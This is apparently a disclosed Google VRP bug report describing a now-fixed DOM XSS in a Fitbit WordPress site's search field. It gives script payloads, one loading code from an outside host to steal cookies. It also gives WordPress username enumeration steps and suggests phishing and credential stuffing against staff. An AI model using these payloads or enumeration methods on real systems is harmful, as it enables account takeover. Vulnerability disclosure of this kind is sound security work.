Skip to Content (Press Enter)
Google
Bug Hunters
Account takeover via DOM XSS with user interaction
Google VRP
triaged
16:56 | Feb 3, 2022
closed
06:18 | Feb 10, 2022
accepted
05:13 | Feb 12, 2022
fixed
08:27 | Mar 21, 2022
reward decided
$100
Google comment
The reward amount is based on the fact that Fitbit (at the time of the report) was considered to be a so-called
non-integrated acquisition
.
Summary:
Account takeover via DOM XSS with user interaction
Product:
Fitbit
URL:
https://healthsolutions.fitbit.com/news/
Vulnerability type:
unknown
Details
The site
https://healthsolutions.fitbit.com/news/
has a search feature. When we search something on this site it does not load the results from server, but passes the search term to
dangerous DOM Sinks
such as
jQuery.after() and element.innerHTML
and renders the result. This makes the site vulnerable to cross site scripting which can be used to steal cookies using document.cookie or deface the site using iframe tags.
A simple payload such as
<script>alert(document.cookie)</script>
or one with my server such as
<script src=https://tzh.xss.ht></script>
is enough to steal the cookies of the victim and cause account takeover since the
cookies are same as that of
main domain
with additional cookies specific to wordpress
While performing this attack I've noticed that both jQuery.after() and element.innerHTML acts as sinks but portswigger
says
element.innerHTML does not accept tags like script, svg on any modern browser . So I think the main problem here is jQuery.after() which allows simple scripts such as
<script src=https://tzh.xss.ht></script>
to be executed.
Since X-Frame-Options protection is there I couldn't turn this vulnerability into zero click account takeover using clickjacking and url parameters are not loaded into the script so no to reflected+DOM vulnerability as well. But there are still other
two methods
to cause account takeover via this vulnerability, I'll detail them below
One easy option to cause zero user interaction  account takeover using malicious extensions to pass the malicious script into search field. This could result in zero click account takeover.
Another method requires user interaction like luring the victim user into pasting the payload into search field. In real world scenario this method is easier to do. Since vulnerability programs don't allow performing such kind of exploitation I'm just reporting this as possible attack scenario.
Since this is a
Wordpress based
website this also allows
Wordpress Admin account takeover
. I'm detailing it below:
Wordpress's metadata endpoint
https://healthsolutions.fitbit.com/wp-json/wp/v2/users
discloses admin usernames via
slug
attribute. I enumerated usernames and emails by incrementally going through all /users/[1-80] endpoints
Some users' "slug" attribute had hyphens but I was able to convert them into valid
usernames or Emails
by replacing hyphens with either a dot or an @
One can easily find out whether these enumerated usernames/emails are valid by the error message shown when entering a random password with these username/emails in
https://healthsolutions.fitbit.com/wp-admin
. The list of usernames and emails I enumerated using this technique are given below:
Usernames
[REDACTED_USERNAME], [REDACTED_USERNAME], [REDACTED_USERNAME], [REDACTED_USERNAME], [REDACTED_USERNAME], [REDACTED_USERNAME], [REDACTED_USERNAME], [REDACTED_USERNAME], [REDACTED_USERNAME], [REDACTED_USERNAME]
Emails
[REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@gmail.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com
Now it's easy to send a targeted phishing mail to these emails which have elevated privilege and if successful this could lead into wp-admin access as well.
I searched the enumerated wp-admin mails on haveibeenpwned.com and found the following emails to be pwned in previous data breaches.
[REDACTED_USERNAME]@gmail.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com, [REDACTED_USERNAME]@fitbit.com,
Breached emails are the regular target of hackers who do attacks like credential stuffing
Even without these emails one can target normal fitbit users as the cookies are same for main domain.
Attack scenario
Hackers who do phishing can easily lure people into believing they are doing something totally normal since it's just a search field.
Any novice hacker can exploit this vulnerability since the attack scenario is very simple. Just input a malicious script into search field
They can cause account takeover of both normal fibit users and admin users of this wordpress page
登录
使用 Google 账号登录